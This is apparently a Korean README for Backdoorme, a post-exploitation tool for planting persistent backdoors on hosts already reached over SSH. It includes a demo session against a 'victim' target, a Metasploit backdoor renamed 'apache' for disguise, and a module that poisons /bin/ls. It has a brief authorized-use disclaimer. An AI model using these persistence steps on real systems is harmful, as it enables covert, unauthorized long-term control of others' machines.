
강력한 자동 백도어 도구
메타스플로잇과 같은 도구는 컴퓨터를 침투하는 데 훌륭하지만, 접근 권한을 얻은 후에는 어떻게 해야 할까요? Backdoorme는 다양한 백도어를 활성화하여 장기간 지속성을 확립함으로써 이 질문에 답합니다.
SSH 연결이 대상과 설정되면 Backdoorme의 강점이 발휘됩니다. 불행히도 Backdoorme는 루트 접근을 획득하는 도구가 아니라, 이미 획득한 접근 권한을 유지하는 도구입니다.
명시적 허가 없이 Backdoorme를 사용하지 마십시오. 허락 없이 해킹하지 마십시오.
Backdoorme는 두 부분으로 나뉩니다: 백도어와 모듈.
백도어는 포트에서 수신 대기하고 bash와 같은 인터프리터로 리디렉션하는 작은 코드 조각입니다. 다양성을 위해 여러 언어로 작성된 많은 백도어가 있습니다.
모듈은 백도어를 더 강력하게 만들어 주기적으로 실행하거나(예: 몇 분마다) 컴퓨터가 부팅될 때 실행하도록 합니다. 이를 통해 지속성을 확립하는 데 도움이 됩니다.
시연:
backdoorme를 시작하려면 먼저 필요한 종속성이 설치되어 있는지 확인하세요.
Python 3.5+의 경우:
$ sudo apt-get install python3 python3-pip python3-tk nmap
$ cd backdoorme/
$ virtualenv --python=python3.5 env
$ source env/bin/activate
(env) $ pip install -r requirements.txt
Python 2.7의 경우:
$ sudo python dependencies.py
backdoorme 실행:
$ python master.py
타겟 추가:
>> addtarget
Target Hostname: 10.1.0.2
Username: victim
Password: password123
+ Target 1 Set!
>>
백도어를 사용하려면 "use" 키워드를 실행하면 됩니다.
>> use shell/metasploit
+ Using current target 1.
+ Using Metasploit backdoor...
(msf) >>
그런 다음 백도어와 관련된 옵션을 설정할 수 있습니다. "show options" 또는 "help"를 실행하여 구성 가능한 매개변수 목록을 확인하세요. 옵션을 설정하려면 "set" 키워드를 사용하면 됩니다.
(msf) >> show options
백도어 옵션:
옵션 값 설명 필수
------ ----- ----------- --------
name initd 백도어 이름 False
...
(msf) >> set name apache
+ name => apache
(msf) >> show options
백도어 옵션:
옵션 값 설명 필수
------ ----- ----------- --------
name apache 백도어 이름 False
...
메타스플로잇에서처럼 백도어는 범주별로 정리됩니다.
모든 백도어에는 추가 모듈을 적용하여 더 강력하게 만들 수 있습니다. 모듈을 추가하려면 "add" 키워드를 사용하면 됩니다.
(msf) >> add poison
+ Poison module added
각 모듈에는 사용자 정의 가능한 추가 매개변수가 있으며, "help"를 다시 실행하면 추가 옵션을 보거나 설정할 수 있습니다.
(msf) >> help
...
포이즌 모듈 옵션:
옵션 값 설명 필수
------ ----- ----------- --------
name ls 중독시킬 명령어 이름 False
location /bin 중독된 파일을 넣을 위치 False
현재 활성화된 모듈:
Backdoorme는 여러 다른 타겟을 동시에 지원하며, 입력 시 번호로 구분됩니다. 코어는 하나의 "현재" 타겟을 유지하며, 새로운 백도어는 기본적으로 이 타겟에 적용됩니다. 타겟을 수동으로 전환하려면 명령어 뒤에 타겟 번호를 추가하면 됩니다: "use metasploit 2"는 두 번째 타겟에 metasploit 백도어를 준비합니다. "list"를 실행하면 현재 타겟 목록, 연결 상태(열림/닫힘), 사용 가능한 백도어 및 모듈을 확인할 수 있습니다.
Backdoorme는 아직 초기 단계입니다! 자유롭게 프로젝트에 기여하세요. 포크하여 변경 사항을 적용한 후 풀 리퀘스트를 보내주세요. 킬러 백도어 아이디어나 개선 사항이 있으신가요? 이슈를 등록해 주시면 최대한 빨리 추가하겠습니다! 질문이 있으시면 [email protected]으로 이메일을 보내주세요.
자체 백도어를 추가하려면 backdoorme/backdoors/template.py 파일에 제공된 지침을 따르세요.
자체 모듈을 추가하려면 backdoorme/modules/template.py 파일에 제공된 지침을 따르세요.
개발자를 위한 치트시트: